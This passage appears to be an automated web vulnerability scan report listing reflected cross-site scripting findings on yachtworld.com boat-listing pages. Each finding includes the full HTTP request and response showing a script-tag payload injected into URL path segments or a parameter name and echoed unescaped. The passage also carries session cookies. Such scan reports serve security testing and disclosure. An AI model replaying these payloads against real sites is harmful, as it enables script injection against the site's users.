Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156027245%7C1298748027245%3B%20s_lv%3D1296156027247%7C1390764027247%3B%20s_lv_s%3DFirst%2520Visit%7C1296157827247%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.8.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:17 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Dec 2010 19:37:18 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:17 GMT
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
el="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2262662&boat_id=2262662&back=/core/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point1c38c"><script>alert(1)</script>4b6b7511d71/NJ/United-States&boat_id=2262662">
...[SNIP]...

3.143. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7910"><script>alert(1)</script>c53b547de37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJb7910"><script>alert(1)</script>c53b547de37/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156027245%7C1298748027245%3B%20s_lv%3D1296156027247%7C1390764027247%3B%20s_lv_s%3DFirst%2520Visit%7C1296157827247%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.8.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:44 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Dec 2010 19:37:18 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:40:43 GMT
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2262662&boat_id=2262662&back=/core/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJb7910"><script>alert(1)</script>c53b547de37/United-States&boat_id=2262662">
...[SNIP]...

3.144. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c482"><script>alert(1)</script>812faad9f1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States7c482"><script>alert(1)</script>812faad9f1b HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156027245%7C1298748027245%3B%20s_lv%3D1296156027247%7C1390764027247%3B%20s_lv_s%3DFirst%2520Visit%7C1296157827247%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.8.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:02 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Dec 2010 19:37:18 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:41:02 GMT
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
f="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2262662&boat_id=2262662&back=/core/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States7c482"><script>alert(1)</script>812faad9f1b&boat_id=2262662">
...[SNIP]...

3.145. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f98"><script>alert(1)</script>b2126836e29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States?66f98"><script>alert(1)</script>b2126836e29=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156027245%7C1298748027245%3B%20s_lv%3D1296156027247%7C1390764027247%3B%20s_lv_s%3DFirst%2520Visit%7C1296157827247%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.8.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:48 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Dec 2010 19:37:18 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%